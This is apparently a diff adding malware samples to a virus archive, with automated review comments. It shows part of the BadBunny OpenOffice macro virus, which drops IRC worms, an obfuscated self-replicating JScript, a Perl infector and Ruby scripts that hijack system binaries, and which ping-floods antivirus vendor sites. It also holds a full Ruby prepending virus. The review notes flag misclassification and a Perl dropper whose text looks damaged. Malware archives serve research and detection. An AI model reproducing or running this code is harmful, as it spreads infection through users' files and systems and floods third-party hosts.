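+Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
+Print #1, "n17= }"
+Print #1, "n18=}"
+Close #1
+
+if ( Dir(dirz &"\mirc") <> "") then
+Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
+end if
+if ( Dir("c:\mirc") <> "") then
+Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
+
+end if
+if ( Dir(dirz &"\mirc32") <> "") then
+Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
+end if
+if ( Dir("c:\mirc32") <> "") then
+Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
+end if
+
+Open "c:\badbunny.js" For Output As #2
+Print #2, "// BadBunny"
+Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
+Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
+Print #2, "var OurCode=me.Read(1759)"
+Print #2, "me.Close()"
+Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
+Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
+Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
+Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
+Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
+Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
+Print #2, "{"
+Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
+Print #2, "{"
+Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
+Print #2, "var Marker=filez.Read(11)"
+Print #2, "var allinone=Marker+filez.ReadAll()"
+Print #2, "filez.Close()"
+Print #2, "if(Marker!=""// BadBunny"")"
+Print #2, "{"
+Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
+Print #2, "filez.Write(OurCode+allinone)"
+Print #2, "filez.Close()"
+Print #2, "}"
+Print #2, "}"
+Print #2, "}"
+Print #2, "function foundit()"
+Print #2, "{"
+Print #2, "fcodea=''; count=0; randon='';"
+Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
+Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
+Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
+Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
+Print #2, "i+=fcodea.length;"
+Print #2, "}"
+Print #2, "//->"
+Close #2
+Shell("c:\badbunny.js",0)
+oDoc.store()
+End Sub
+
+sub lin()
+'xchat2worm part by WarGame
+dim HomeDir as string
+dim xchat2script as string
+dim perlvir as string
+dim cmd as string
+dim WgeT as string
+Dim dummy()
+Dim iVar As Integer
+Dim Args(0) as new com.sun.star.beans.PropertyValue
+Args(0).Name = "MacroExecutionMode"
+Args(0).Value = _
+com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
+ThisComponent.LockControllers
+datei="/tmp/badbunny.odg"
+dateiurl=converttourl(datei)
+odoc=thisComponent
+odoc.storeasurl(dateiurl,dummy())
+
+' get home dir
+HomeDir = Environ("HOME")
+
+'build the path of our xchat2 script
+if HomeDir = "" then
+' I could not get $HOME !
+
+else
+xchat2script = HomeDir & "/.xchat2/badbunny.py"
+
+' drop the python script
+Open xchat2script For Output As #1
+print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
+print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
+print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
+print #1,"import xchat"
+print #1,"def onkick_cb(word, word_eol, userdata):"
+print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
+print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
+print #1," return xchat.EAT_NONE"
+print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
+close #1
+endif
+
+'drop the perl virus
+perlvir = HomeDir & "/BadBunny.pl"
+open perlvir for output as #1
+print #1,"#BadBunny"
+print #1,"open(File,$0);@MyCode = ;close(File);"
+print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
+print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
+print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
+close #1
+cmd = "perl " & perlvir
+shell(cmd,0)
+
+oDoc.store()
+end sub
+
+sub mac()
+Dim iVar As Integer
+iVar = Int((15 * Rnd) -2)
+Select Case iVar
+Case 1 To 5
+call one
+Case 6, 7, 8
+call two
+Case Is > 8 And iVar < 11
+call one
+Case Else
+call two
+End Select
+end sub
+
+sub one ()
+'thx to skyout
+Open "badbunny.rb" For Output As #1
+print #1,"#!/usr/bin/env ruby"
+print #1,"require 'ftools'"
+print #1,"def replacecmd(cmdname, dirpath)"
+print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
+print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
+print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
+print #1,"oldcmd.puts ""puts \""\"""
+print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
+print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
+print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
+print #1,"oldcmd.puts ""puts \""\"""""
+print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
+print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""3\"""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""2\"""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""1\"""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""\"""
+print #1,"oldcmd.puts ""for $args in $* do"""
+print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
+print #1,"oldcmd.puts ""end"""
+print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
+print #1,"oldcmd.puts ""exit 0"""
+print #1,"end"
+print #1,"$binary_dirs = Array.new"
+print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
+print #1,"for $dir in $binary_dirs do"
+print #1,"if File.directory?($dir) then"
+print #1,"if File.writable?($dir) then"
+print #1,"Dir.open($dir).each do |file|"
+print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
+print #1,"replacecmd(file, $dir)"
+print #1,"end"
+print #1,"end"
+print #1,"end"
+print #1,"end"
+print #1,"exit 0"
+close #1
+Shell("badbunny.rb",0)
+end sub
+
+sub two() 'thx to SPTH for this...
+Open "badbunnya.rb" For Output As #2
+print #2,"# BADB"
+print #2,"mycode="""
+print #2,"mych=File.open(__FILE__)"
+print #2,"myc=mych.read(1)"
+print #2,"while myc!=nil"
+print #2,"mycode+=myc"
+print #2,"myc=mych.read(1)"
+print #2,"end"
+print #2,"mycode=mycode[mycode.length-734,734]"
+print #2,"cdir = Dir.open(Dir.getwd)"
+print #2,"cdir.each do |a|"
+print #2,"if File.ftype(a)==""file"" then"
+print #2,"if a[a.length-3, a.length]=="".rb"" then"
+print #2,"if a!=File.basename(__FILE__) then"
+print #2,"fcode="""
+print #2,"fle=open(a)"
+print #2,"badb=fle.read(1)"
+print #2,"while badb!=nil"
+print #2,"fcode+=badb"
+print #2,"badb=fle.read(1)"
+print #2,"end"
+print #2,"fle.close"
+print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
+print #2,"fcode=fcode+13.chr+10.chr+mycode"
+print #2,"fle=open(a,""w"")"
+print #2,"fle.print fcode"
+print #2,"fle.close"
+print #2,"end"
+print #2,"end"
+print #2,"end"
+print #2,"end"
+print #2,"end"
+print #2,"cdir.close"
+close #2
+Shell("badbunnya.rb",0)
+End Sub
+
+sub ping()
+Shell("ping -l 5000 -t www.ikarus.at",0)
+Shell("ping -l 5000 -t www.aladdin.com",0)
+Shell("ping -l 5000 -t www.norman.no",0)
+Shell("ping -l 5000 -t www.norman.com",0)
+Shell("ping -l 5000 -t www.kaspersky.com",0)
+Shell("ping -l 5000 -t www.kaspersky.ru",0)
+Shell("ping -l 5000 -t www.kaspersky.pl",0)
+Shell("ping -l 5000 -t www.grisoft.cz",0)
+Shell("ping -l 5000 -t www.symantec.com",0)
+Shell("ping -l 5000 -t www.proantivirus.com",0)
+Shell("ping -l 5000 -t www.f-secure.com",0)
+Shell("ping -l 5000 -t www.sophos.com",0)
+Shell("ping -l 5000 -t www.arcabit.pl",0)
+Shell("ping -l 5000 -t www.arcabit.com",0)
+Shell("ping -l 5000 -t www.avira.com",0)
+Shell("ping -l 5000 -t www.avira.de",0)
+Shell("ping -l 5000 -t www.avira.ro",0)
+Shell("ping -l 5000 -t www.avast.com",0)
+Shell("ping -l 5000 -t www.virusbuster.hu",0)
+Shell("ping -l 5000 -t www.trendmicro.com",0)
+Shell("ping -l 5000 -t www.bitdefender.com",0)
+Shell("ping -l 5000 -t www.pandasoftware.comm",0)
+Shell("ping -l 5000 -t www.drweb.com",0)
+Shell("ping -l 5000 -t www.drweb.ru",0)
+Shell("ping -l 5000 -t www.viruslist.com",0)
+end sub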
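Review bot: This file is OpenOffice StarBasic, not Ruby — `Sub badbunny()`, `Dim mEventProps(1) as new com.sun.star.beans.PropertyValue`, `Open ... For Output As #1` — and Ruby appears only as one of the payloads it drops in `sub one` and `sub two`, so the `Ruby/` directory and the `Virus.Ruby.Badbunny.a` name misclassify the sample for anyone sorting the corpus by language. The Perl dropper in `sub lin` also appears to have lost text in transit: `open(File,$0);@MyCode = ;close(File);` and `while(){` read as if a `<File>` readline operator was stripped, presumably by an HTML sanitiser, so the archived text is probably not byte-faithful to the original. Since samples should not be edited in place, I would record both points in a README or index entry beside the file, e.g. `Badbunny.a: OOo StarBasic macro virus (drops mIRC/xchat2/JS/Perl/Ruby payloads); Perl dropper text is damaged (missing <File> operators); contains live hostnames (image URL in badbunny(), ping targets in ping()).`, and consider moving it out of `Ruby/`.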
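--- a/Ruby/Virus.Ruby.Pydoxon.b
+++ b/Ruby/Virus.Ruby.Pydoxon.b
@@ -0,0 +1,26 @@
+# RUBY.Paradoxon
+mycode=File.open(__FILE__).read(630)
+cdir = Dir.open(Dir.getwd)
+cdir.each do |a|
+if File.ftype(a)=="file" then
+if a[a.length-3, a.length]==".rb" then
+if a!=File.basename(__FILE__) then
+fcode=""
+fle=open(a)
+spth=fle.read(1)
+while spth!=nil
+fcode+=spth
+spth=fle.read(1)
+end
+fle.close
+if fcode[7,9]!="Paradoxon" then
+fcode=mycode+13.chr+10.chr+fcode
+fle=open(a,"w")
+fle.print fcode
+fle.close
+end
+end
+end
+end
+end
+cdir.close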
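Review bot: The path `Ruby/Virus.Ruby.Pydoxon.b` disagrees with the sample's own marker `# RUBY.Paradoxon` on its first line, which is also the string the reinfection check `if fcode[7,9]!="Paradoxon" then` keys on, so a reader searching the corpus for Paradoxon will not find this file. The prepender also depends on exact byte counts — `mycode=File.open(__FILE__).read(630)` copies a fixed 630-byte prefix and the infected file is joined with `13.chr+10.chr`, i.e. CRLF — so if the mirror or a checkout normalises line endings the self-read prefix may no longer cover the 26-line body; that is worth a note rather than a fix, since the sample should stay byte-faithful. I would add an index entry rather than edit the file, e.g. `Pydoxon.b: RUBY.Paradoxon prepending virus; 630-byte self-read assumes the original CRLF line endings — verify before analysis.` The handle from `File.open(__FILE__)` is never closed, but that is the sample's own defect, not something the commit should change.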